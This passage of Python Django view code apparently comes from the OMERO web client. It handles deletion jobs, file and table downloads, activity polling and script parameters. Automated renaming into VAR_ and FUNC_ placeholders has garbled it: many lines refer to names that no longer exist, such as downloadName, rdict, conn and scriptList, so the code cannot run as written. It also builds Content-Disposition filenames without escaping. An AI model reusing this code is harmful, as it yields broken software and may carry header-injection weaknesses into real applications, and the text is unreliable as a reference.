VAR_363 = {"bad": "true", "errs": VAR_364}
return JsonResponse(VAR_363)
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "remove":
VAR_82 = VAR_2.POST["parent"]
try:
VAR_104.remove(VAR_82.split("|"))
except Exception as x:
VAR_0.error(traceback.format_exc())
VAR_363 = {"bad": "true", "errs": VAR_347(x)}
return JsonResponse(VAR_363)
rdict = {"bad": "false"}
return JsonResponse(VAR_363)
elif VAR_27 == "removefromshare":
VAR_256 = VAR_2.POST.get("source")
try:
VAR_104.removeImage(VAR_256)
except Exception as x:
VAR_0.error(traceback.format_exc())
VAR_363 = {"bad": "true", "errs": VAR_347(x)}
return JsonResponse(VAR_363)
rdict = {"bad": "false"}
return JsonResponse(VAR_363)
elif VAR_27 == "delete":
VAR_455 = toBoolean(VAR_2.POST.get("child"))
VAR_91 = toBoolean(VAR_2.POST.get("anns"))
try:
VAR_84 = VAR_104.deleteItem(VAR_455, VAR_91)
VAR_2.session["callback"][VAR_347(VAR_84)] = {
"job_type": "delete",
"delmany": False,
"did": VAR_29,
"dtype": VAR_28,
"status": "in progress",
"error": 0,
"dreport": _formatReport(VAR_84),
"start_time": datetime.datetime.now(),
}
VAR_2.session.modified = True
except Exception as x:
VAR_0.error(
"Failed to delete: %r" % {"did": VAR_29, "dtype": VAR_28}, exc_info=True
)
VAR_363 = {"bad": "true", "errs": VAR_347(x)}
else:
VAR_363 = {"bad": "false"}
return JsonResponse(VAR_363)
elif VAR_27 == "deletemany":
VAR_457 = {
"Image": VAR_2.POST.getlist("image"),
"Dataset": VAR_2.POST.getlist("dataset"),
"Project": VAR_2.POST.getlist("project"),
"Annotation": VAR_2.POST.getlist("tag"),
"Screen": VAR_2.POST.getlist("screen"),
"Plate": VAR_2.POST.getlist("plate"),
"Well": VAR_2.POST.getlist("well"),
"PlateAcquisition": VAR_2.POST.getlist("acquisition"),
}
VAR_455 = toBoolean(VAR_2.POST.get("child"))
VAR_91 = toBoolean(VAR_2.POST.get("anns"))
VAR_0.debug(
"Delete many: VAR_455? %s VAR_91? %s VAR_457 %s" % (VAR_455, VAR_91, VAR_457)
)
try:
for VAR_312, VAR_187 in VAR_457.items():
if VAR_187 is not None and len(VAR_187) > 0:
VAR_84 = VAR_104.deleteObjects(VAR_312, VAR_187, VAR_455, VAR_91)
if VAR_312 == "PlateAcquisition":
VAR_312 = "Plate Run" # for nicer user VAR_382
VAR_459 = {
"job_type": "delete",
"start_time": datetime.datetime.now(),
"status": "in progress",
"error": 0,
"dreport": _formatReport(VAR_84),
"dtype": VAR_312,
}
if len(VAR_187) > 1:
VAR_459["delmany"] = len(VAR_187)
VAR_459["did"] = VAR_187
else:
VAR_459["delmany"] = False
VAR_459["did"] = VAR_187[0]
VAR_2.session["callback"][VAR_347(VAR_84)] = VAR_459
VAR_2.session.modified = True
except Exception:
VAR_0.error(
"Failed to delete: %r" % {"did": VAR_187, "dtype": VAR_312}, exc_info=True
)
raise
else:
VAR_363 = {"bad": "false"}
return JsonResponse(VAR_363)
VAR_53["template"] = VAR_54
return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_54(VAR_2, VAR_30, VAR_31=False, VAR_6=None, **VAR_7):
VAR_6.SERVICE_OPTS.setOmeroGroup(-1)
VAR_173 = VAR_6.getObject("OriginalFile", VAR_30)
if VAR_173 is None:
return handlerInternalError(
VAR_2, "Original File does not exist (id:%s)." % (VAR_30)
)
VAR_174 = ConnCleaningHttpResponse(VAR_173.getFileInChunks(buf=settings.CHUNK_SIZE))
VAR_174.conn = VAR_6
VAR_175 = VAR_173.mimetype
if VAR_175 == "text/x-python":
VAR_175 = "text/plain" # allows display in browser
VAR_174["Content-Type"] = VAR_175
VAR_174["Content-Length"] = VAR_173.getSize()
if VAR_31:
VAR_300 = VAR_173.name.replace(" ", "_")
VAR_300 = downloadName.replace(",", ".")
VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
return VAR_174
@login_required(doConnectionCleanup=False)
@render_response()
def FUNC_55(VAR_2, VAR_32, VAR_33=None, VAR_6=None, **VAR_7):
VAR_176 = VAR_2.GET.get("query", "*")
VAR_177 = FUNC_0(VAR_2, "offset", 0)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_178 = None
try:
VAR_178 = VAR_352("omero_iviewer_index")
except NoReverseMatch:
pass
VAR_32 = VAR_241(VAR_32)
VAR_173 = VAR_6.getObject("OriginalFile", VAR_32)
if VAR_173 is None:
raise Http404("OriginalFile %s not found" % VAR_32)
VAR_179 = VAR_33 == "csv"
VAR_53 = webgateway_views._table_query(
VAR_2, VAR_32, VAR_6=conn, VAR_176=query, VAR_177=offset, VAR_88=limit, VAR_179=lazy
)
if VAR_53.get("error") or not VAR_53.get("data"):
return JsonResponse(VAR_53)
if VAR_33 == "csv":
VAR_301 = VAR_53.get("data")
VAR_302 = VAR_2.GET.get("header") == "false"
def FUNC_88():
if not VAR_302:
VAR_405 = ",".join(VAR_301.get("columns"))
yield VAR_405
for rows in VAR_301.get("lazy_rows"):
yield (
"\n" + "\n".join([",".join([VAR_347(VAR_364) for VAR_364 in VAR_378]) for VAR_378 in rows])
)
VAR_300 = VAR_173.name.replace(" ", "_").replace(",", ".")
VAR_300 = downloadName + ".csv"
VAR_174 = TableClosingHttpResponse(FUNC_88(), content_type="text/csv")
VAR_174.conn = VAR_6
VAR_174.table = VAR_53.get("table")
VAR_174["Content-Type"] = "application/force-download"
VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
return VAR_174
VAR_53["data"]["name"] = VAR_173.name
VAR_53["data"]["path"] = VAR_173.path
VAR_53["data"]["id"] = VAR_32
VAR_53["meta"]["query"] = VAR_176
if VAR_177 == 0 or VAR_177 / VAR_88 == VAR_177 // VAR_88:
VAR_53["meta"]["page"] = (VAR_177 // VAR_88) + 1 if VAR_177 > 0 else 1
VAR_5 = VAR_352("omero_table", args=[VAR_32])
VAR_53["meta"]["url"] = VAR_5
VAR_5 += "?VAR_88=%s" % VAR_88
if VAR_176 != "*":
VAR_5 += "&VAR_176=%s" % VAR_176
if (VAR_177 + VAR_88) < VAR_53["meta"]["totalCount"]:
VAR_53["meta"]["next"] = VAR_5 + "&VAR_177=%s" % (VAR_177 + VAR_88)
if VAR_177 > 0:
VAR_53["meta"]["prev"] = VAR_5 + "&VAR_177=%s" % (max(0, VAR_177 - VAR_88))
if VAR_33 is None:
VAR_53["template"] = "webclient/annotations/FUNC_55.html"
VAR_53["iviewer_url"] = VAR_178
VAR_303 = VAR_53["data"]["column_types"]
if "ImageColumn" in VAR_303:
VAR_53["image_column_index"] = VAR_303.index("ImageColumn")
if "WellColumn" in VAR_303:
VAR_53["well_column_index"] = VAR_303.index("WellColumn")
if "RoiColumn" in VAR_303:
VAR_53["roi_column_index"] = VAR_303.index("RoiColumn")
VAR_304 = [VAR_390.lower() for VAR_390 in VAR_53["data"]["columns"]]
if "shape" in VAR_304 and VAR_303[VAR_304.index("shape")] == "LongColumn":
VAR_53["shape_column_index"] = VAR_304.index("shape")
for idx, VAR_23 in enumerate(VAR_303):
if VAR_23 in ("DoubleColumn", "LongColumn"):
VAR_406 = VAR_53["data"]["columns"][idx]
VAR_407 = []
for VAR_378 in VAR_53["data"]["rows"]:
if VAR_378[idx]:
VAR_407.append(VAR_378[idx])
if len(VAR_407) > 3:
break
if " " in VAR_406 or len(VAR_407) < 2:
continue
VAR_53["example_column"] = VAR_406
VAR_53["example_min_value"] = min(VAR_407)
VAR_53["example_max_value"] = max(VAR_407)
break
return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_56(VAR_2, VAR_34, VAR_6=None, **VAR_7):
VAR_180 = VAR_6.getObject("FileAnnotation", VAR_34)
if VAR_180 is None:
return handlerInternalError(
VAR_2, "FileAnnotation does not exist (id:%s)." % (VAR_34)
)
VAR_174 = ConnCleaningHttpResponse(VAR_180.getFileInChunks(buf=settings.CHUNK_SIZE))
VAR_174.conn = VAR_6
VAR_174["Content-Type"] = "application/force-download"
VAR_174["Content-Length"] = VAR_180.getFileSize()
VAR_174["Content-Disposition"] = "attachment; filename=%s" % (
VAR_180.getFileName().replace(" ", "_")
)
return VAR_174
@login_required()
def FUNC_57(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_142 = VAR_6.getObject("Image", VAR_26)
if VAR_142 is None:
raise Http404("No Image found with ID %s" % VAR_26)
VAR_181 = VAR_142.loadOriginalMetadata()
VAR_182 = ["[Global Metadata]"]
VAR_182.extend(["%s=%s" % (kv[0], kv[1]) for kv in VAR_181[1]])
VAR_182.append("[Series Metadata]")
VAR_182.extend(["%s=%s" % (kv[0], kv[1]) for kv in VAR_181[2]])
VAR_183 = "\n".join(VAR_182)
VAR_174 = HttpResponse(VAR_183)
VAR_174["Content-Type"] = "application/force-download"
VAR_174["Content-Length"] = len(VAR_183)
VAR_174["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
return VAR_174
@login_required()
@render_response()
def FUNC_58(VAR_2, VAR_6=None, **VAR_7):
VAR_184 = VAR_2.GET.get("format", None)
if VAR_184 is not None:
VAR_191 = VAR_352("download_as")
VAR_305 = "Export_as_%s" % VAR_184
else:
VAR_191 = VAR_352("archived_files")
VAR_305 = "OriginalFileDownload"
VAR_185 = VAR_2.GET.get("ids") # E.g. VAR_142-1|VAR_142-2
VAR_186 = VAR_2.GET.get("name", VAR_305) # VAR_4 zip VAR_3
VAR_186 = os.path.basename(VAR_186) # remove VAR_316
if VAR_185 is None:
raise Http404("No IDs specified. E.g. ?VAR_187=VAR_142-1|VAR_142-2")
VAR_187 = VAR_185.split("|")
VAR_188 = []
VAR_189 = 0
VAR_190 = 0
if VAR_184 is None:
VAR_306 = []
VAR_214 = []
for VAR_320 in VAR_187:
if VAR_320.split("-")[0] == "image":
VAR_306.append(VAR_320.split("-")[1])
elif VAR_320.split("-")[0] == "well":
VAR_214.append(VAR_320.split("-")[1])
VAR_106 = []
if VAR_306:
VAR_106 = list(VAR_6.getObjects("Image", VAR_306))
if len(VAR_106) == 0:
raise Http404("No VAR_106 found.")
VAR_307 = set()
VAR_308 = set()
for VAR_142 in VAR_106:
VAR_365 = VAR_142.getFileset()
if VAR_365 is not None:
if VAR_365.id in VAR_307:
continue
VAR_307.add(VAR_365.id)
VAR_284 = list(VAR_142.getImportedImageFiles())
VAR_366 = []
for f in VAR_284:
if f.id in VAR_308:
continue
VAR_308.add(f.id)
VAR_366.append({"id": f.id, "name": f.name, "size": f.getSize()})
VAR_190 += f.getSize()
if len(VAR_366) > 0:
VAR_188.append(VAR_366)
VAR_189 = sum([len(VAR_366) for VAR_366 in VAR_188])
else:
VAR_189 = len(VAR_187)
VAR_176 = "&".join([_id.replace("-", "=") for _id in VAR_187])
VAR_191 = download_url + "?" + VAR_176
if VAR_184 is not None:
VAR_191 = download_url + "&VAR_184=%s" % VAR_184
VAR_53 = {
"template": "webclient/annotations/FUNC_58.html",
"url": VAR_191,
"defaultName": VAR_186,
"fileLists": VAR_188,
"fileCount": VAR_189,
"filesTotalSize": VAR_190,
}
if VAR_190 > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
VAR_53["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_59(VAR_2, VAR_35=None, VAR_36=None, VAR_6=None, **VAR_7):
VAR_54 = "webclient/history/calendar.html"
VAR_192 = VAR_2.session.get("user_id")
if VAR_35 is not None and VAR_36 is not None:
VAR_193 = BaseCalendar(VAR_6=conn, VAR_35=year, VAR_36=month, eid=VAR_192)
else:
VAR_309 = datetime.datetime.today()
VAR_193 = BaseCalendar(
VAR_6=conn, VAR_35=VAR_309.year, VAR_36=VAR_309.month, eid=VAR_192
)
VAR_193.create_calendar()
VAR_53 = {"controller": VAR_193}
VAR_53["template"] = VAR_54
return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_60(VAR_2, VAR_35, VAR_36, VAR_37, VAR_6=None, **VAR_7):
if VAR_35 is None or VAR_36 is None or VAR_37 is None:
raise Http404("Year, VAR_36, and VAR_37 are required")
VAR_54 = "webclient/history/history_details.html"
VAR_87 = int(VAR_2.GET.get("page", 1))
VAR_192 = VAR_2.session.get("user_id")
VAR_193 = BaseCalendar(
VAR_6=conn, VAR_35=year, VAR_36=month, VAR_37=day, eid=VAR_192
)
VAR_193.get_items(VAR_87)
VAR_53 = {"controller": VAR_193}
VAR_53["template"] = VAR_54
return VAR_53
def FUNC_61(VAR_6, VAR_38):
VAR_194 = VAR_352(viewname="load_template", args=["userdata"])
if isinstance(VAR_38, omero.model.FileAnnotationI):
VAR_310 = VAR_6.getObject("Annotation", VAR_38.id.val)
for VAR_255 in ["project", "dataset", "image"]:
VAR_240 = list(VAR_310.getParentLinks(VAR_255))
if len(VAR_240) > 0:
VAR_38 = VAR_240[0].parent
break
if VAR_38.__class__.__name__ in (
"ImageI",
"DatasetI",
"ProjectI",
"ScreenI",
"PlateI",
"WellI",
):
VAR_311 = VAR_38.__class__.__name__[:-1].lower()
VAR_194 += "?VAR_59=%s-%s" % (VAR_311, VAR_38.id.val)
return VAR_194
def FUNC_62(VAR_2, VAR_39, **VAR_7):
for VAR_312, VAR_375 in VAR_7.items():
VAR_2.session["callback"][VAR_39][VAR_312] = VAR_375
@login_required()
@render_response()
def FUNC_63(VAR_2, VAR_6=None, **VAR_7):
VAR_195 = 0
VAR_196 = 0
VAR_197 = []
_purgeCallback(VAR_2)
VAR_198 = VAR_2.GET.get("jobId", None)
if VAR_198 is not None:
VAR_198 = VAR_347(VAR_198)
try:
VAR_367 = omero.cmd.HandlePrx.checkedCast(VAR_6.c.ic.stringToProxy(VAR_198))
VAR_315 = VAR_367.getStatus()
VAR_0.debug("job VAR_315: %s", VAR_315)
VAR_174 = VAR_367.getResponse()
if VAR_174 is not None:
VAR_172 = graphResponseMarshal(VAR_6, VAR_174)
VAR_172["finished"] = True
else:
VAR_172 = {"finished": False}
VAR_172["status"] = {
"currentStep": VAR_315.currentStep,
"steps": VAR_315.steps,
"startTime": VAR_315.startTime,
"stopTime": VAR_315.stopTime,
}
except IceException:
VAR_172 = {"finished": True}
return VAR_172
elif VAR_2.method == "DELETE":
try:
VAR_17 = json.loads(VAR_2.body)
except TypeError:
VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
VAR_198 = VAR_17.get("jobId", None)
if VAR_198 is not None:
VAR_198 = VAR_347(VAR_198)
VAR_172 = {"jobId": VAR_198}
try:
VAR_367 = omero.cmd.HandlePrx.checkedCast(VAR_6.c.ic.stringToProxy(VAR_198))
VAR_315 = VAR_367.getStatus()
VAR_0.debug("pre-cancel() job VAR_315: %s", VAR_315)
VAR_172["status"] = {
"currentStep": VAR_315.currentStep,
"steps": VAR_315.steps,
"startTime": VAR_315.startTime,
"stopTime": VAR_315.stopTime,
}
VAR_367.cancel()
except omero.LockTimeout:
VAR_0.info("Timeout on VAR_367.cancel()")
return VAR_172
for VAR_39 in VAR_2.session.get("callback").keys():
VAR_313 = VAR_2.session["callback"][VAR_39]
VAR_314 = VAR_313["job_type"]
VAR_315 = VAR_313["status"]
if VAR_315 == "failed":
VAR_196 += 1
VAR_2.session.modified = True
if VAR_314 in ("chgrp", "chown"):
if VAR_315 not in ("failed", "finished"):
VAR_174 = None
try:
VAR_367 = omero.cmd.HandlePrx.checkedCast(
VAR_6.c.ic.stringToProxy(VAR_39)
)
VAR_174 = VAR_367.getResponse()
VAR_431 = False
try:
if VAR_174 is not None:
VAR_431 = True
VAR_197.append(VAR_39)
if isinstance(VAR_174, omero.cmd.ERR):
VAR_447 = ", ".join(
[
"%s: %s" % (VAR_415, VAR_416)
for VAR_415, VAR_416 in VAR_174.parameters.items()
]
)
VAR_0.error(
"%s failed with: %s" % (VAR_314, VAR_447)
)
FUNC_62(
VAR_2,
VAR_39,
VAR_315="failed",
report="%s %s" % (VAR_174.name, VAR_447),
VAR_57=1,
)
elif isinstance(VAR_174, omero.cmd.OK):
FUNC_62(VAR_2, VAR_39, VAR_315="finished")
else:
VAR_195 += 1
finally:
VAR_367.close(VAR_431)
except Exception:
VAR_0.info(
"Activities %s VAR_84 not found: %s" % (VAR_314, VAR_39)
)
continue
elif VAR_314 == "send_email":
if VAR_315 not in ("failed", "finished"):
VAR_174 = None
try:
VAR_367 = omero.cmd.HandlePrx.checkedCast(
VAR_6.c.ic.stringToProxy(VAR_39)
)
VAR_444 = omero.callbacks.CmdCallbackI(
VAR_6.c, VAR_367, foreground_poll=True
)
VAR_174 = VAR_444.getResponse()
VAR_431 = False
try:
if VAR_174 is not None:
VAR_431 = True
VAR_197.append(VAR_39)
if isinstance(VAR_174, omero.cmd.ERR):
VAR_447 = ", ".join(
[
"%s: %s" % (VAR_415, VAR_416)
for VAR_415, VAR_416 in VAR_174.parameters.items()
]
)
VAR_0.error("send_email failed with: %s" % VAR_447)
FUNC_62(
VAR_2,
VAR_39,
VAR_315="failed",
report={"error": VAR_447},
VAR_57=1,
)
else:
VAR_450 = (
VAR_174.success
+ len(VAR_174.invalidusers)
+ len(VAR_174.invalidemails)
)
FUNC_62(
VAR_2,
VAR_39,
VAR_315="finished",
VAR_174={"success": VAR_174.success, "total": VAR_450},
)
if (
len(VAR_174.invalidusers) > 0
or len(VAR_174.invalidemails) > 0
):
VAR_453 = [
e.getFullName()
for e in list(
VAR_6.getObjects(
"Experimenter", VAR_174.invalidusers
)
)
]
FUNC_62(
VAR_2,
VAR_39,
report={
"invalidusers": VAR_453,
"invalidemails": VAR_174.invalidemails,
},
)
else:
VAR_195 += 1
finally:
VAR_444.close(VAR_431)
except Exception:
VAR_0.error(traceback.format_exc())
VAR_0.info("Activities send_email VAR_84 not found: %s" % VAR_39)
elif VAR_314 == "delete":
if VAR_315 not in ("failed", "finished"):
try:
VAR_84 = omero.cmd.HandlePrx.checkedCast(
VAR_6.c.ic.stringToProxy(VAR_39)
)
VAR_446 = omero.callbacks.CmdCallbackI(
VAR_6.c, VAR_84, foreground_poll=True
)
VAR_174 = VAR_446.getResponse()
VAR_431 = False
try:
if not VAR_174: # Response not available
FUNC_62(
VAR_2,
VAR_39,
VAR_57=0,
VAR_315="in progress",
dreport=_formatReport(VAR_84),
)
VAR_195 += 1
else: # Response available
VAR_431 = True
VAR_197.append(VAR_39)
VAR_174 = VAR_446.getResponse()
VAR_451 = isinstance(VAR_174, omero.cmd.ERR)
if VAR_451:
FUNC_62(
VAR_2,
VAR_39,
VAR_57=1,
VAR_315="failed",
dreport=_formatReport(VAR_84),
)
VAR_196 += 1
else:
FUNC_62(
VAR_2,
VAR_39,
VAR_57=0,
VAR_315="finished",
dreport=_formatReport(VAR_84),
)
finally:
VAR_446.close(VAR_431)
except Ice.ObjectNotExistException:
FUNC_62(
VAR_2, VAR_39, VAR_57=0, VAR_315="finished", dreport=None
)
except Exception as x:
VAR_0.error(traceback.format_exc())
VAR_0.error("Status job '%s'error:" % VAR_39)
FUNC_62(
VAR_2, VAR_39, VAR_57=1, VAR_315="failed", dreport=VAR_347(x)
)
VAR_196 += 1
elif VAR_314 == "script":
if not VAR_39.startswith("ProcessCallback"):
continue # ignore
if VAR_315 not in ("failed", "finished"):
VAR_0.info("Check VAR_444 on script: %s" % VAR_39)
try:
VAR_448 = omero.grid.ScriptProcessPrx.checkedCast(
VAR_6.c.ic.stringToProxy(VAR_39)
)
except IceException:
FUNC_62(
VAR_2,
VAR_39,
VAR_315="failed",
Message="No process found for job",
VAR_57=1,
)
continue
VAR_446 = omero.scripts.ProcessCallbackI(VAR_6.c, VAR_448)
if VAR_446.block(0): # ms.
VAR_446.close()
try:
VAR_452 = VAR_448.getResults(0, VAR_6.SERVICE_OPTS)
FUNC_62(VAR_2, VAR_39, VAR_315="finished")
VAR_197.append(VAR_39)
except Exception:
FUNC_62(
VAR_2,
VAR_39,
VAR_315="finished",
Message="Failed to FUNC_81 results",
)
VAR_0.info("Failed on VAR_448.getResults() for OMERO.script")
continue
VAR_449 = {}
for VAR_312, VAR_375 in VAR_452.items():
VAR_416 = VAR_375.getValue()
if VAR_312 in ("stdout", "stderr", "Message"):
if VAR_312 in ("stderr", "stdout"):
VAR_416 = VAR_416.id.val
VAR_454 = {VAR_312: VAR_416}
FUNC_62(VAR_2, VAR_39, **VAR_454)
else:
if hasattr(VAR_416, "id"):
VAR_456 = {
"id": VAR_416.id.val,
"type": VAR_416.__class__.__name__[:-1],
}
VAR_456["browse_url"] = FUNC_61(VAR_6, VAR_416)
if VAR_416.isLoaded() and hasattr(VAR_416, "file"):
VAR_458 = {
"image/png": "png",
"image/jpeg": "jpeg",
"text/plain": "text",
}
if VAR_416.file.mimetype.val in VAR_458:
VAR_456["fileType"] = VAR_458[
VAR_416.file.mimetype.val
]
VAR_456["fileId"] = VAR_416.file.id.val
VAR_456["name"] = VAR_416.file.name.val
if VAR_416.isLoaded() and hasattr(VAR_416, "name"):
VAR_3 = unwrap(VAR_416.name)
if VAR_3 is not None:
VAR_456["name"] = VAR_3
VAR_449[VAR_312] = VAR_456
else:
VAR_449[VAR_312] = unwrap(VAR_416)
FUNC_62(VAR_2, VAR_39, VAR_452=VAR_449)
else:
VAR_195 += 1
VAR_172 = {}
for VAR_39 in VAR_2.session.get("callback").keys():
VAR_172[VAR_39] = copy.copy(VAR_2.session["callback"][VAR_39])
if "template" in VAR_7 and VAR_7["template"] == "json":
for VAR_39 in VAR_2.session.get("callback").keys():
VAR_172[VAR_39]["start_time"] = VAR_347(
VAR_2.session["callback"][VAR_39]["start_time"]
)
VAR_172["inprogress"] = VAR_195
VAR_172["failure"] = VAR_196
VAR_172["jobs"] = len(VAR_2.session["callback"])
return JsonResponse(VAR_172) # json
VAR_199 = []
VAR_200 = False
for VAR_312, VAR_158 in VAR_172.items():
if len(VAR_312.split(" ")) > 0:
VAR_368 = VAR_312.split(" ")[0]
if len(VAR_368.split("/")) > 1:
VAR_368 = htmlId.split("/")[1]
VAR_172[VAR_312]["id"] = VAR_368
VAR_172[VAR_312]["key"] = VAR_312
if VAR_312 in VAR_197:
VAR_172[VAR_312]["new"] = True
if "error" in VAR_158 and VAR_158["error"] > 0:
VAR_200 = True
VAR_199.append(VAR_172[VAR_312])
VAR_199.sort(VAR_312=lambda x: x["start_time"], VAR_352=True)
VAR_53 = {
"sizeOfJobs": len(VAR_2.session["callback"]),
"jobs": VAR_199,
"inprogress": VAR_195,
"new_results": len(VAR_197),
"new_errors": VAR_200,
"failure": VAR_196,
}
VAR_53["template"] = "webclient/FUNC_63/activitiesContent.html"
return VAR_53
@login_required()
def FUNC_64(VAR_2, VAR_27, **VAR_7):
VAR_2.session.modified = True
if VAR_27 == "clean":
if "jobKey" in VAR_2.POST:
VAR_198 = VAR_2.POST.get("jobKey")
VAR_172 = {}
if VAR_198 in VAR_2.session["callback"]:
del VAR_2.session["callback"][VAR_198]
VAR_2.session.modified = True
VAR_172["removed"] = True
else:
VAR_172["removed"] = False
return JsonResponse(VAR_172)
else:
VAR_199 = list(VAR_2.session["callback"].items())
for VAR_312, VAR_158 in VAR_199:
if VAR_158["status"] != "in progress":
del VAR_2.session["callback"][VAR_312]
return HttpResponse("OK")
@login_required()
def FUNC_65(VAR_2, VAR_40=None, VAR_6=None, **VAR_7):
VAR_201 = VAR_6.getExperimenterPhoto(VAR_40)
return HttpResponse(VAR_201, content_type="image/jpeg")
@login_required()
def FUNC_66(VAR_2, VAR_41, VAR_25=None, **VAR_7):
VAR_7["viewport_server"] = (
VAR_25 is not None and VAR_352("webindex") + VAR_25 or VAR_352("webindex")
)
VAR_7["viewport_server"] = VAR_7["viewport_server"].rstrip("/")
return webgateway_views.full_viewer(VAR_2, VAR_41, **VAR_7)
@login_required()
@render_response()
def FUNC_67(VAR_2, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
VAR_203 = VAR_202.getScripts()
VAR_204 = {}
VAR_205 = (
VAR_2.session.get("server_settings", {})
.get("scripts_to_ignore", "")
.split(",")
)
for s in VAR_203:
VAR_42 = s.id.val
VAR_316 = s.path.val
VAR_3 = s.name.val
VAR_317 = os.path.join(VAR_316, VAR_3)
if VAR_317 in VAR_205:
VAR_0.info("Ignoring script %r" % VAR_317)
continue
ul = VAR_204
VAR_318 = VAR_317.split(os.path.sep)
for li, VAR_364 in enumerate(VAR_318):
if len(VAR_364) == 0:
continue
if VAR_364 not in VAR_206:
if li + 1 == len(VAR_318):
VAR_206[VAR_364] = VAR_42
else:
VAR_206[VAR_364] = {}
VAR_206 = ul[VAR_364]
def FUNC_85(VAR_206):
VAR_319 = []
for VAR_3, VAR_375 in VAR_206.items():
if isinstance(VAR_375, dict):
VAR_319.append({"name": VAR_3, "ul": FUNC_85(VAR_375)})
else:
VAR_319.append({"name": VAR_3, "id": VAR_375})
VAR_319.sort(VAR_312=lambda x: x["name"].lower())
return VAR_319
VAR_207 = FUNC_85(VAR_204)
if not VAR_2.GET.get("full_path") and len(VAR_207) == 1:
VAR_207 = scriptList[0]["ul"]
return VAR_207
@login_required()
@render_response()
def FUNC_68(VAR_2, VAR_42, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
try:
VAR_73 = VAR_202.getParams(VAR_241(VAR_42))
except Exception as ex:
if ex.message.lower().startswith("no processor available"):
return {
"template": "webclient/VAR_203/no_processor.html",
"scriptId": VAR_42,
}
raise ex
if VAR_73 is None:
return HttpResponse()
VAR_208 = {}
VAR_208["id"] = VAR_241(VAR_42)
VAR_208["name"] = VAR_73.name.replace("_", " ")
VAR_208["description"] = VAR_73.description
VAR_208["authors"] = ", ".join([a for a in VAR_73.authors])
VAR_208["contact"] = VAR_73.contact
VAR_208["version"] = VAR_73.version
VAR_208["institutions"] = ", ".join([VAR_320 for VAR_320 in VAR_73.institutions])
VAR_209 = [] # use a list so we can sort by 'grouping'
VAR_210 = None
VAR_211 = None
for VAR_312, VAR_322 in VAR_73.inputs.items():
VAR_320 = {}
VAR_320["name"] = VAR_312.replace("_", " ")
VAR_320["key"] = VAR_312
if not VAR_322.optional:
VAR_320["required"] = True
VAR_320["description"] = VAR_322.description
if VAR_322.min:
VAR_320["min"] = VAR_347(VAR_322.min.getValue())
if VAR_322.max:
VAR_320["max"] = VAR_347(VAR_322.max.getValue())
if VAR_322.values:
VAR_320["options"] = [VAR_416.getValue() for VAR_416 in VAR_322.values.getValue()]
if VAR_322.useDefault:
VAR_320["default"] = unwrap(VAR_322.prototype)
if isinstance(VAR_320["default"], omero.model.IObject):
VAR_320["default"] = None
VAR_321 = unwrap(VAR_322.prototype)
if VAR_321.__class__.__name__ == "dict":
VAR_320["map"] = True
elif VAR_321.__class__.__name__ == "list":
VAR_320["list"] = True
if "default" in VAR_320:
VAR_320["default"] = ",".join([VAR_347(VAR_364) for VAR_364 in VAR_320["default"]])
elif isinstance(VAR_321, bool):
VAR_320["boolean"] = True
elif isinstance(VAR_321, int) or isinstance(VAR_321, VAR_241):
VAR_320["number"] = "number"
elif isinstance(VAR_321, float):
VAR_320["number"] = "float"
if VAR_2.GET.get(VAR_312, None) is not None:
VAR_320["default"] = VAR_2.GET.get(VAR_312, None)
VAR_320["prototype"] = unwrap(VAR_322.prototype)
VAR_320["grouping"] = VAR_322.grouping
VAR_209.append(VAR_320)
if VAR_312 == "IDs":
VAR_211 = VAR_320 # remember these...
if VAR_312 == "Data_Type":
VAR_210 = VAR_320
VAR_209.sort(VAR_312=lambda VAR_320: VAR_320["grouping"])
if (
VAR_210 is not None
and VAR_211 is not None
and "options" in VAR_210
):
VAR_211["default"] = ""
for VAR_215 in VAR_210["options"]:
if VAR_2.GET.get(VAR_215, None) is not None:
VAR_210["default"] = VAR_215
VAR_211["default"] = VAR_2.GET.get(VAR_215, "")
break # only use the first match
if len(VAR_211["default"]) == 0 and VAR_2.GET.get("Well", None) is not None:
if "Image" in VAR_210["options"]:
VAR_214 = [VAR_241(j) for j in VAR_2.GET.get("Well", None).split(",")]
VAR_324 = 0
try:
VAR_324 = int(VAR_2.GET.get("Index", 0))
except Exception:
pass
VAR_113 = VAR_6.getObjects("Well", VAR_214)
VAR_306 = [VAR_347(w.getImage(VAR_324).getId()) for w in VAR_113]
VAR_210["default"] = "Image"
VAR_211["default"] = ",".join(VAR_306)
for VAR_320 in range(len(VAR_209)):
if len(VAR_209) <= VAR_320:
break
VAR_322 = VAR_209[VAR_320]
VAR_323 = VAR_322["grouping"] # E.g 03
VAR_322["children"] = list()
while len(VAR_209) > VAR_320 + 1:
VAR_369 = VAR_209[VAR_320 + 1]["grouping"] # E.g. 03.1
if VAR_369.split(".")[0] == VAR_323:
VAR_322["children"].append(VAR_209[VAR_320 + 1])
VAR_209.pop(VAR_320 + 1)
else:
break
VAR_208["inputs"] = VAR_209
return {
"template": "webclient/VAR_203/FUNC_68.html",
"paramData": VAR_208,
"scriptId": VAR_42,
}
@login_required()
@render_response()
def FUNC_69(VAR_2, VAR_43, VAR_6=None, **VAR_7):
VAR_212 = VAR_2.GET.get("Image", None) # comma - delimited list
VAR_213 = VAR_2.GET.get("Dataset", None)
VAR_214 = VAR_2.GET.get("Well", None)
if VAR_214 is not None:
VAR_214 = [VAR_241(VAR_320) for VAR_320 in VAR_214.split(",")]
VAR_113 = VAR_6.getObjects("Well", VAR_214)
VAR_324 = getIntOrDefault(VAR_2, "Index", 0)
VAR_212 = [VAR_347(w.getImage(VAR_324).getId()) for w in VAR_113]
VAR_212 = ",".join(VAR_212)
if VAR_212 is None and VAR_213 is None:
return HttpResponse(
"Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
)
def FUNC_86(VAR_215, VAR_187):
